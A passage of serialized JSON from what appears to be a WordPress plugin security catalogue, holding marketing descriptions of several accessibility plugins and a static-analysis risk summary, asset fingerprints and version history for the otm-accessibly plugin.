\u002F>\n🇸🇰 Slovenčina\u003Cbr \u002F>\n🇳🇱 Nederlands\u003Cbr \u002F>\n🇩🇰 Dansk\u003Cbr \u002F>\n🇬🇷 Ελληνικά\u003Cbr \u002F>\n🇨🇿 Čeština\u003Cbr \u002F>\n🇭🇺 Magyar\u003Cbr \u002F>\n🇱🇹 Lietuvių\u003Cbr \u002F>\n🇱🇻 Latviešu\u003Cbr \u002F>\n🇪🇪 Eesti\u003Cbr \u002F>\n🇭🇷 Hrvatski\u003Cbr \u002F>\n🇮🇪 Gaeilge\u003Cbr \u002F>\n🇧🇬 Български\u003Cbr \u002F>\n🇳🇴 Norsk\u003Cbr \u002F>\n🇹🇷 Türkçe\u003Cbr \u002F>\n🇮🇩 Bahasa Indonesia\u003Cbr \u002F>\n🇧🇷 Português (Brasil)\u003Cbr \u002F>\n🇯🇵 日本語\u003Cbr \u002F>\n🇰🇷 한국어\u003Cbr \u002F>\n🇨🇳 简体中文\u003Cbr \u002F>\n🇸🇦 العربية\u003Cbr \u002F>\n🇷🇺 Русский\u003Cbr \u002F>\n🇮🇳 हिन्दी\u003Cbr \u002F>\n🇺🇦 Українська\u003Cbr \u002F>\n🇷🇸 Српски\u003Cbr \u002F>\n🇬🇧 British English\u003Cbr \u002F>\n🇮🇷 فارسی (für إيران)\u003Cbr \u002F>\n🇮🇱 עברית\u003Cbr \u002F>\n🇲🇰 Македонски\u003Cbr \u002F>\n🇹🇭 ไทย\u003Cbr \u002F>\n🇻🇳 Tiếng Việt\u003C\u002Fp>\n\u003Ch3>Show or hide languages\u003C\u002Fh3>\n\u003Cp>You decide which languages your visitors see. Simply hide the ones you don’t need. This keeps your menu clean and makes it easy for your customers to find the right language.\u003C\u002Fp>\n\u003Ch3>See What Our Users Have to Say\u003C\u002Fh3>\n\u003Cp>\u003Cem>OneTap Accessibility has greatly improved our site’s usability—super easy to install with so many helpful features!”\u003C\u002Fem> ★★★★★ (Aisha Patel)\u003C\u002Fp>\n\u003Cp>\u003Cem>The user-friendly interface made setup a breeze. Our visitors love the new accessibility options”\u003C\u002Fem> ★★★★★ (Dejan Manovic)\u003C\u002Fp>\n\u003Cp>\u003Cem>Fantastic plugin! The accessibility options are extensive and simple to configure. Perfect for any professional website.”\u003C\u002Fem> ★★★★★ (Ralf Grünberger)\u003C\u002Fp>\n\u003Cp>\u003Cem>Love how dependable this plugin is! No issues, just consistent performance and powerful accessibility options”\u003C\u002Fem> ★★★★★ (Rafael Silva JR)\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Unlock Full Accessibility \u003Cspan aria-hidden=\"true\" class=\"wp-exclude-emoji\">→\u003C\u002Fspan> \u003Ca href=\"https:\u002F\u002Fwponetap.com\u002Fpricing\u002F\" rel=\"nofollow ugc\">Get OneTap Pro!\u003C\u002Fa>\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Ch3>24\u002F7 Support\u003C\u002Fh3>\n\u003Cp>Our 24\u002F7 support is always available to ensure a smooth experience with the plugin—get quick answers anytime, day or night. Support:\u003Cbr \u002F>\n\u003Cspan aria-hidden=\"true\" class=\"wp-exclude-emoji\">→\u003C\u002Fspan> \u003Ca href=\"https:\u002F\u002Fwponetap.com\u002Fsupport\" rel=\"nofollow ugc\">https:\u002F\u002Fwponetap.com\u002Fsupport\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Lifetime Packages for Agencies\u003C\u002Fh3>\n\u003Cp>Use OneTap PRO on all client projects with a single one-time payment — no recurring costs, no limits. Perfect for agencies that want full flexibility and predictable pricing.\u003Cbr \u002F>\n\u003Cspan aria-hidden=\"true\" class=\"wp-exclude-emoji\">→\u003C\u002Fspan> \u003Ca href=\"https:\u002F\u002Fwponetap.com\u002Fagency-pricing\" rel=\"nofollow ugc\">https:\u002F\u002Fwponetap.com\u002Fagency-pricing\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Help Translate OneTap into your language\u003C\u002Fh3>\n\u003Cp>Your contribution helps make accessibility easier and more inclusive for people around the world.\u003Cbr \u002F>\n\u003Cspan aria-hidden=\"true\" class=\"wp-exclude-emoji\">→\u003C\u002Fspan> \u003Ca href=\"https:\u002F\u002Ftranslate.wordpress.org\u002Fprojects\u002Fwp-plugins\u002Faccessibility-onetap\" rel=\"nofollow ugc\">https:\u002F\u002Ftranslate.wordpress.org\u002Fprojects\u002Fwp-plugins\u002Faccessibility-onetap\u003C\u002Fa>\u003C\u002Fp>\n","OneTap is a multilingual WordPress plugin designed for seamless website accessibility.",40000,168442,98,72,"2026-03-18T13:03:00.000Z","6.6","7.4",[100,22,23,24,101],"accessibility-widget","wp-accessibility","https:\u002F\u002Fwponetap.com","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Faccessibility-onetap.2.10.0.zip",{"slug":105,"name":106,"version":107,"author":108,"author_profile":109,"description":110,"short_description":111,"active_installs":112,"downloaded":113,"rating":114,"num_ratings":115,"last_updated":116,"tested_up_to":77,"requires_at_least":78,"requires_php":18,"tags":117,"homepage":119,"download_link":120,"security_score":121,"vuln_count":122,"unpatched_count":82,"last_vuln_date":123,"fetched_at":83},"accessibe","Web Accessibility by accessiBe","2.13","accessiBe","https:\u002F\u002Fprofiles.wordpress.org\u002Faccessibewp\u002F","\u003Cp>accessWidget, accessiBe’s leading AI-powered web accessibility solution, helps make your website accessible and ADA compliant based on WCAG, allowing you to generate more business and traffic.\u003C\u002Fp>\n\u003Cp>You can explore accessWidget with a 7-day free trial; no credit card required.\u003C\u002Fp>\n\u003Ch3>Meet legal requirements under the ADA and win more business\u003C\u002Fh3>\n\u003Cp>Ensuring that your WordPress website is accessible to all visitors, including individuals with disabilities, is critical for a number of reasons.\u003C\u002Fp>\n\u003Cp>First and foremost, adjusting your website so that it is accessible is a moral and ethical imperative. There is also the matter of meeting legal obligations, under laws such as the Americans with Disabilities Act (ADA) and the European Accessibility Act (EAA).\u003C\u002Fp>\n\u003Cp>But it’s important to realize that making your WordPress accessible and ADA-compliant greatly impacts its business potential.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>An accessible website allows you to appeal to a new audience base (\u003Ca href=\"https:\u002F\u002Fwww.thevaluable500.com\u002Fpress-release\u002Fthe-valuable-500-releases-new-data-on-global-accessibility-awareness-day#:~:text=Disability%20is%20not%20a%20minority,when%20including%20friends%20and%20family.\" rel=\"nofollow ugc\">which commands trillions in annual expendable income\u003C\u002Fa>), as well as to enhance your brand reputation.\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Ch3>How accessWidget Helps\u003C\u002Fh3>\n\u003Cp>\u003Cstrong>With accessWidget, accessiBe’s accessibility plugin for ADA compliance, your website is adjusted so that it welcomes all visitors, including those with disabilities.\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>accessWidget leverages the power of AI to run an automated audit of your website to identify and remediate accessibility issues existing on a code level. This results in your website being compatible with assistive technology like screen readers, and fully navigable via keyboard.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>accessWidget is quick and easy to install, and automatically scans and remediates inaccessible elements on your website every 24 hours, ensuring ongoing accessibility, without touching your source code.\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Ch3>Give website visitors a customized user experience\u003C\u002Fh3>\n\u003Cp>accessWidget will also present website visitors with an accessibility interface, through which they can adjust design elements to better fit their needs.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>With accessWidget, website visitors can increase font size and change font types, adjust color contrasts, and stop animations, among many other options.\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>You can explore the accessWidget plugin with a 7-day free trial; no credit card required.\u003C\u002Fp>\n","Fix accessibility issues & make your site accessible with an AI-powered accessibility service.",10000,291551,82,32,"2026-02-23T13:02:00.000Z",[20,22,23,24,118],"wordpress-accessibility","https:\u002F\u002Faccessibe.com\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Faccessibe.2.13.zip",95,5,"2026-02-18 00:00:00",{"slug":100,"name":125,"version":126,"author":127,"author_profile":128,"description":129,"short_description":130,"active_installs":112,"downloaded":131,"rating":132,"num_ratings":133,"last_updated":134,"tested_up_to":77,"requires_at_least":135,"requires_php":136,"tags":137,"homepage":138,"download_link":139,"security_score":75,"vuln_count":28,"unpatched_count":82,"last_vuln_date":140,"fetched_at":83},"AccessYes Accessibility Widget for ADA, EAA & WCAG Readiness","3.1.3","CookieYes","https:\u002F\u002Fprofiles.wordpress.org\u002Fcookieyesdev\u002F","\u003Cp>AccessYes Accessibility Widget is a free, lightweight, and user-friendly plugin that adds an accessibility overlay to your WordPress website.\u003C\u002Fp>\n\u003Cp>The accessibility widget provides tools to help your site better align with accessibility standards such as the Web Content Accessibility Guidelines (WCAG) 2.1 AA, as well as accessibility laws like the Americans with Disabilities Act (ADA) and the European Accessibility Act (EAA).\u003C\u002Fp>\n\u003Cp>With just a few clicks, your website visitors can customise font size, color contrast, spacing, and more to create a browsing experience that fits their accessibility needs.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Disclaimer:\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>AccessYes Accessibility Widget is intended to support your accessibility efforts. It does not guarantee conformance with WCAG or compliance with laws such as the ADA, EAA, or other regulations. Full compliance may still require a comprehensive audit and remediation.\u003C\u002Fp>\n\u003Ch3>Why accessibility matters\u003C\u002Fh3>\n\u003Cp>Over 1 billion people globally live with some form of disability. This makes web accessibility essential to ensure your content is usable for everyone, including those with visual, cognitive, motor, and neurological impairments.\u003C\u002Fp>\n\u003Cp>With WordPress powering over 43% of all websites in 2026, improving accessibility on WordPress sites can make a big difference in creating a more inclusive web.\u003C\u002Fp>\n\u003Cp>AccessYes Accessibility Widget helps you take a step in that direction by giving visitors simple tools to adjust how your WordPress website looks and behaves based on their needs.\u003C\u002Fp>\n\u003Ch3>Features\u003C\u002Fh3>\n\u003Ch4>Content adjustments\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Cstrong>Font size controls:\u003C\u002Fstrong> Enable users to adjust the font size for enhanced readability.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Highlight title:\u003C\u002Fstrong> Emphasise page titles to aid scanning and comprehension.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Highlight features:\u003C\u002Fstrong> Highlight all links and\u002For page titles for easier scanning and focus.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Dyslexia-friendly fonts:\u003C\u002Fstrong> Let users switch to high-legibility fonts for better cognitive accessibility.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Font weight control:\u003C\u002Fstrong> Bolden text across your site to increase contrast and visibility.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Letter spacing & line height adjustments:\u003C\u002Fstrong> Enable precise control over text layout to support users with dyslexia or reading challenges.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Align left:\u003C\u002Fstrong> Align all content to the left for a consistent reading experience.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Color adjustments\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Cstrong>Contrast modes:\u003C\u002Fstrong> Includes Dark Mode, Light Mode, and High Contrast for visual comfort.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Saturation options:\u003C\u002Fstrong> Allow users to toggle between low saturation, high saturation, and monochrome (grayscale) views.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Navigation adjustments\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Cstrong>Reading guide:\u003C\u002Fstrong> A horizontal guide that helps users track lines of text while reading.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Pause animations:\u003C\u002Fstrong> Let users pause animations or motions that could be distracting or trigger discomfort.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Big cursor:\u003C\u002Fstrong> Increase cursor size and contrast for better navigation visibility.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Accessibility statement\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Cstrong>Create an accessibility statement:\u003C\u002Fstrong> Generate your website accessibility statement inside the tool and display it in the widget.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Link an existing statement:\u003C\u002Fstrong> Connect your existing accessibility statement or VPAT and display it within the widget.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Need help?\u003C\u002Fstrong> Write to us at support@cookieyes.com with a quick note in the subject line: CookieYes Accessibility Widget\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Got feedback about the plugin?\u003C\u002Fstrong> We’d love to hear it! Drop us a line at accessyes@cookieyes.com.\u003C\u002Fp>\n\u003Cp>\u003Cem>Note: AccessYes is a standalone accessibility widget developed by CookieYes. It’s a separate tool designed to work independently from the CookieYes platform.\u003C\u002Fem>\u003C\u002Fp>\n","Free WordPress accessibility widget to improve accessibility for your website visitors. Supports efforts towards meeting WCAG, ADA & EAA requirements.",137112,94,22,"2026-03-30T10:50:00.000Z","5.0.0","5.6",[100,22,23,24,101],"https:\u002F\u002Fwww.cookieyes.com\u002Faccessibility-widget\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Faccessibility-widget.3.1.3.zip","2024-04-22 00:00:00",{"slug":142,"name":143,"version":144,"author":145,"author_profile":146,"description":147,"short_description":148,"active_installs":149,"downloaded":150,"rating":94,"num_ratings":151,"last_updated":152,"tested_up_to":77,"requires_at_least":153,"requires_php":98,"tags":154,"homepage":158,"download_link":159,"security_score":75,"vuln_count":82,"unpatched_count":82,"last_vuln_date":38,"fetched_at":83},"tool-for-ada-section-508-and-seo","Accessibility Tools & Alt Text Finder","3.0","Joseph LoPreste","https:\u002F\u002Fprofiles.wordpress.org\u002Ffoucciano\u002F","\u003Cp>This software HELPS you in the process of becoming ADA Section 508 compliant by providing:\u003C\u002Fp>\n\u003Ch3>Missing Alt Text Finder\u003C\u002Fh3>\n\u003Cp>Easily add any Missing Alt Text, Description Text or Caption Text to all of the pictures in your Media Library and the pictures that are already published on your Pages and Posts.\u003C\u002Fp>\n\u003Ch3>Contrast Ratio Checker\u003C\u002Fh3>\n\u003Cp>Provides you with a Contrast Ratio Checker to make sure everything hits the minimum requirements.\u003C\u002Fp>\n\u003Ch3>WCAG 3.0 Compliance Checklist\u003C\u002Fh3>\n\u003Cp>A interactive WCAG 3.0 Section 508 Checklist that helps you better understand your websites accessibility issues.\u003C\u002Fp>\n\u003Ch3>Automated Accessibility Audit\u003C\u002Fh3>\n\u003Cp>You can activate the A11Y auditing function and run multiple accessibility tests on your website and even get suggestions on how to fix them.\u003C\u002Fp>\n\u003Ch3>Resources\u003C\u002Fh3>\n\u003Cp>We give you some great resources in the form of links that will help you better understand web accessibility and help your website become even more inclusive.\u003C\u002Fp>\n\u003Ch3>Course Related Functionality\u003C\u002Fh3>\n\u003Cp>Access comprehensive accessibility training courses and educational materials directly within the plugin. Learn best practices, understand WCAG guidelines, and master accessibility implementation through interactive courses designed to help you and your team become accessibility experts.\u003C\u002Fp>\n\u003Cp>While this plugin can HELP you meet compliance requirements, you are the only one that can ensure that all requirements are met.\u003C\u002Fp>\n\u003Cp>If you find this plugin useful, please rate and review it. If you have a problem with this plugin, please send me an email letting us know what issues you are having. I will address all issues in a timely fashion. Thank you!\u003C\u002Fp>\n\u003Ch3>External Services\u003C\u002Fh3>\n\u003Cp>This plugin uses the following third-party services:\u003C\u002Fp>\n\u003Col>\n\u003Cli>\u003Cstrong>Incrementable.js\u003C\u002Fstrong>\u003Cbr \u002F>\nUsed in the contrast testing tool to allow keyboard-accessible incrementable fields.  \u003C\u002Fli>\n\u003C\u002Fol>\n\u003Cp>– Loaded from: \u003Ccode>https:\u002F\u002Fleaverou.github.com\u002Fincrementable\u002Fincrementable.js\u003C\u002Fcode>\u003Cbr \u002F>\n– No user data is sent.\u003Cbr \u002F>\n– License: MIT License\u003Cbr \u002F>\n– Source: \u003Ca href=\"https:\u002F\u002Fgithub.com\u002FLeaVerou\u002Fincrementable\" rel=\"nofollow ugc\">https:\u002F\u002Fgithub.com\u002FLeaVerou\u002Fincrementable\u003C\u002Fa>\u003C\u002Fp>\n\u003Col>\n\u003Cli>\u003Cstrong>Example API (Replace with actual endpoint)\u003C\u002Fstrong>\u003Cbr \u002F>\nUsed to send page URLs to an external server for SEO auditing (if applicable).  \u003C\u002Fli>\n\u003C\u002Fol>\n\u003Cp>– Endpoint: \u003Ccode>http:\u002F\u002Fmyserver.com\u002F\u003C\u002Fcode>\u003Cbr \u002F>\n– Data sent: page URL\u003Cbr \u002F>\n– Sent only during SEO analysis execution.\u003Cbr \u002F>\n– If you operate this server, link your own Privacy Policy here.\u003Cbr \u002F>\n  Example: \u003Ca href=\"https:\u002F\u002Fyourdomain.com\u002Fprivacy-policy\" rel=\"nofollow ugc\">https:\u002F\u002Fyourdomain.com\u002Fprivacy-policy\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Main Features Are:\u003C\u002Fh3>\n\u003Col>\n\u003Cli>\n\u003Cp>Shows you all of the pictures from either your Media Library, Posts or Pages that are missing any of the 3 types of text. (Alternative Text, Description text or Caption Text)\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Allows you to add any missing – Alternative Text, Description Text or Caption Text to any of your pictures one at a time.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Allows you to add missing Alternative Text, Description Text or Caption Text to all of your pictures with just one click.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Helps the process of making your website ADA Section 508 Compliant become much easier. (by adding Alt Text to all pictures on your website)\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Allows you to run a Automated A11Y Accessibility Audit so you can see where you are not compliant.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Provides a free Contrast Ratio Checker. This allows you to easily understand your websites contrast ratios.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>We provide you a interactive (WCAG 3.0) Section 508 Checklist. This checklist helps you better understand the WCAG 3.0 recommendations and guidelines.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>We offer a ton of Free Accessibility resources in the form of links that will greatly help your understanding of web accessibility.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Access comprehensive accessibility training courses and educational materials to learn best practices and master accessibility implementation.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Ch3>The video below is how to use our missing alt text feature.\u003C\u002Fh3>\n\u003Ch3>The video below is part 2 on how to use all of the new accessibility tools we added.\u003C\u002Fh3>\n\u003Ch3>The video below is us giving our “Web Accessibility Made Easy” talk in Tampa Fl.\u003C\u002Fh3>\n\u003Ch3>Source Code\u003C\u002Fh3>\n\u003Cp>This plugin includes bundled\u002Fminified JavaScript and CSS files to optimize performance. To comply with WordPress.org guidelines for human-readable code, the original, non-minified source code is included directly within the plugin under:\u003C\u002Fp>\n\u003Cpre>\u003Ccode>\u002Fassets\u002Fsrc\u002F or `\u002Fsrc\u002F`\n\u003C\u002Fcode>\u003C\u002Fpre>\n\u003Cp>This includes:\u003Cbr \u002F>\n– Original JavaScript files before minification or bundling.\u003Cbr \u002F>\n– SASS\u002FSCSS or uncompiled CSS files (if applicable).\u003Cbr \u002F>\n– Any build configuration files (such as webpack.config.js or angular.json if used).\u003C\u002Fp>\n\u003Cp>These files are provided to ensure transparency and promote open-source collaboration.\u003C\u002Fp>\n\u003Ch3>License\u003C\u002Fh3>\n\u003Cp>This plugin is licensed under the GPLv2 or later. For more information, see \u003Ca href=\"https:\u002F\u002Fwww.gnu.org\u002Flicenses\u002Fgpl-3.0.html\" rel=\"nofollow ugc\">https:\u002F\u002Fwww.gnu.org\u002Flicenses\u002Fgpl-3.0.html\u003C\u002Fa>.\u003C\u002Fp>\n","Accessibility Tools Included: Missing Alt text finder, contrast checker, WCAG 3.0 checklist, automated testing software and a ton of free resources.",3000,42978,69,"2026-02-26T10:43:00.000Z","4.8",[21,155,156,157,24],"ada-section-508-standards","media-library","missing-alternative-text-finder","","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ftool-for-ada-section-508-and-seo.3.0.zip",{"attackSurface":161,"codeSignals":215,"taintFlows":227,"riskAssessment":228,"analyzedAt":237},{"hooks":162,"ajaxHandlers":211,"restRoutes":212,"shortcodes":213,"cronEvents":214,"entryPointCount":82,"unprotectedCount":82},[163,169,174,178,182,186,190,195,197,199,200,201,202,203,205,206,207,208,209],{"type":164,"name":165,"callback":166,"file":167,"line":168},"action","wp_enqueue_scripts","prepareFrontendScripts","public\\AccessiblyApp.php",19,{"type":164,"name":170,"callback":171,"file":172,"line":173},"admin_init","redirectAfterActivation","public\\admin\\AdminApp.php",16,{"type":164,"name":175,"callback":176,"file":172,"line":177},"admin_enqueue_scripts","enqueueScripts",17,{"type":164,"name":179,"callback":180,"file":172,"line":181},"admin_menu","buildMenu",18,{"type":164,"name":183,"callback":184,"file":172,"line":185},"otm_ac_redirect","setRedirectTransient",20,{"type":164,"name":187,"callback":188,"priority":75,"file":172,"line":189},"otm_ac_activate","doRedirectAction",21,{"type":164,"name":191,"callback":192,"file":193,"line":194},"rest_api_init","AccessiblyApp\\register_routes","public\\ApiLoader.php",7,{"type":164,"name":165,"callback":166,"file":196,"line":168},"trunk\\public\\AccessiblyApp.php",{"type":164,"name":170,"callback":171,"file":198,"line":173},"trunk\\public\\admin\\AdminApp.php",{"type":164,"name":175,"callback":176,"file":198,"line":177},{"type":164,"name":179,"callback":180,"file":198,"line":181},{"type":164,"name":183,"callback":184,"file":198,"line":185},{"type":164,"name":187,"callback":188,"priority":75,"file":198,"line":189},{"type":164,"name":170,"callback":171,"file":204,"line":173},"trunk\\public\\admin_deprecated\\AdminApp.php",{"type":164,"name":175,"callback":176,"file":204,"line":177},{"type":164,"name":179,"callback":180,"file":204,"line":181},{"type":164,"name":183,"callback":184,"file":204,"line":185},{"type":164,"name":187,"callback":188,"priority":75,"file":204,"line":189},{"type":164,"name":191,"callback":192,"file":210,"line":194},"trunk\\public\\ApiLoader.php",[],[],[],[],{"dangerousFunctions":216,"sqlUsage":217,"outputEscaping":219,"fileOperations":222,"externalRequests":82,"nonceChecks":82,"capabilityChecks":82,"bundledLibraries":223},[],{"prepared":82,"raw":82,"locations":218},[],{"escaped":220,"rawEcho":82,"locations":221},12,[],2,[224],{"name":225,"version":38,"knownCves":226},"Guzzle",[],[],{"summary":229,"deductions":230},"The otm-accessibly v3.0.3 plugin exhibits a strong security posture based on the provided static analysis. The complete absence of AJAX handlers, REST API routes, shortcodes, and cron events significantly limits the plugin's attack surface. Furthermore, the code adheres to secure coding practices with 100% of SQL queries utilizing prepared statements and all output being properly escaped. The presence of Guzzle as a bundled library is noted, but without information on its version, its security implications cannot be definitively assessed. The lack of any recorded vulnerabilities, including CVEs, further contributes to its perceived safety.\n\nHowever, the analysis does reveal a notable lack of security checks. Specifically, there are no nonce checks and no capability checks. While the limited attack surface might mitigate the immediate risk, the absence of these fundamental security mechanisms on any potential future entry points or internal functions could become a significant concern if the plugin's functionality or entry points were to expand. This reliance on the absence of vulnerabilities rather than robust preventative measures is a weakness. The vulnerability history is a strength, indicating a historically secure plugin, but it doesn't negate the importance of implementing basic security checks.\n\nIn conclusion, otm-accessibly v3.0.3 appears to be a secure plugin due to its minimal attack surface and adherence to safe coding practices in its current implementation. The absence of known vulnerabilities is a positive indicator. Nevertheless, the lack of nonce and capability checks presents a latent risk. If the plugin were to be expanded or its usage context changed, these missing checks could expose it to vulnerabilities. It is recommended to consider implementing these basic security measures to further harden the plugin against potential future threats.",[231,233,235],{"reason":232,"points":122},"Missing nonce checks",{"reason":234,"points":122},"Missing capability checks",{"reason":236,"points":50},"Bundled library (Guzzle) version unknown","2026-03-16T19:42:42.822Z",{"wat":239,"direct":252},{"assetPaths":240,"generatorPatterns":245,"scriptPaths":246,"versionParams":247},[241,242,243,244],"\u002Fwp-content\u002Fplugins\u002Fotm-accessibly\u002Ffrontend\u002Fbuild\u002Fjs\u002Fruntime.js","\u002Fwp-content\u002Fplugins\u002Fotm-accessibly\u002Ffrontend\u002Fbuild\u002Fjs\u002Fapp.js","\u002Fwp-content\u002Fplugins\u002Fotm-accessibly\u002Ffrontend\u002Fbuild\u002Fcss\u002Fapp.css","\u002Fwp-content\u002Fplugins\u002Fotm-accessibly\u002Fpublic\u002Fassets\u002Fimages\u002F",[],[241,242],[248,249,250,251],"otm-accessibly\u002Ffrontend\u002Fbuild\u002Fjs\u002Fruntime.js?ver=","otm-accessibly\u002Ffrontend\u002Fbuild\u002Fjs\u002Fapp.js?ver=","otm-accessibly\u002Ffrontend\u002Fbuild\u002Fcss\u002Fapp.css?ver=","accessibly-app?ver=",{"cssClasses":253,"htmlComments":255,"htmlAttributes":256,"restEndpoints":258,"jsGlobals":259,"shortcodeOutput":261},[254],"accessibly-app",[],[257],"data-accessibly-app",[],[260],"accessiblyConfig",[],{"error":263,"url":264,"statusCode":265,"statusMessage":266,"message":266},true,"http:\u002F\u002Flocalhost\u002Fapi\u002Fplugins\u002Fotm-accessibly\u002Fbundle",404,"no bundle for this plugin yet",{"slug":4,"current_version":6,"total_versions":268,"versions":269},6,[270,276,284,292,300,308],{"version":6,"download_url":26,"svn_tag_url":271,"released_at":38,"has_diff":49,"diff_files_changed":272,"diff_lines":38,"trac_diff_url":273,"vulnerabilities":274,"is_current":263},"https:\u002F\u002Fplugins.svn.wordpress.org\u002Fotm-accessibly\u002Ftags\u002F3.0.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fotm-accessibly%2Ftags%2F3.0.2&new_path=%2Fotm-accessibly%2Ftags%2F3.0.3",[275],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":38},{"version":277,"download_url":278,"svn_tag_url":279,"released_at":38,"has_diff":49,"diff_files_changed":280,"diff_lines":38,"trac_diff_url":281,"vulnerabilities":282,"is_current":49},"3.0.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fotm-accessibly.3.0.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fotm-accessibly\u002Ftags\u002F3.0.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fotm-accessibly%2Ftags%2F2.7.7&new_path=%2Fotm-accessibly%2Ftags%2F3.0.2",[283],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":38},{"version":285,"download_url":286,"svn_tag_url":287,"released_at":38,"has_diff":49,"diff_files_changed":288,"diff_lines":38,"trac_diff_url":289,"vulnerabilities":290,"is_current":49},"2.7.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fotm-accessibly.2.7.7.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fotm-accessibly\u002Ftags\u002F2.7.7\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fotm-accessibly%2Ftags%2F2.7.6&new_path=%2Fotm-accessibly%2Ftags%2F2.7.7",[291],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":38},{"version":293,"download_url":294,"svn_tag_url":295,"released_at":38,"has_diff":49,"diff_files_changed":296,"diff_lines":38,"trac_diff_url":297,"vulnerabilities":298,"is_current":49},"2.7.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fotm-accessibly.2.7.6.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fotm-accessibly\u002Ftags\u002F2.7.6\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fotm-accessibly%2Ftags%2F2.7.1&new_path=%2Fotm-accessibly%2Ftags%2F2.7.6",[299],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":38},{"version":301,"download_url":302,"svn_tag_url":303,"released_at":38,"has_diff":49,"diff_files_changed":304,"diff_lines":38,"trac_diff_url":305,"vulnerabilities":306,"is_current":49},"2.7.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fotm-accessibly.2.7.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fotm-accessibly\u002Ftags\u002F2.7.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fotm-accessibly%2Ftags%2F2.0&new_path=%2Fotm-accessibly%2Ftags%2F2.7.1",[307],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":38},{"version":309,"download_url":310,"svn_tag_url":311,"released_at":38,"has_diff":49,"diff_files_changed":312,"diff_lines":38,"trac_diff_url":38,"vulnerabilities":313,"is_current":49},"2.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fotm-accessibly.2.0.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fotm-accessibly\u002Ftags\u002F2.0\u002F",[],[314],{"id":34,"url_slug":35,"title":36,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":38}]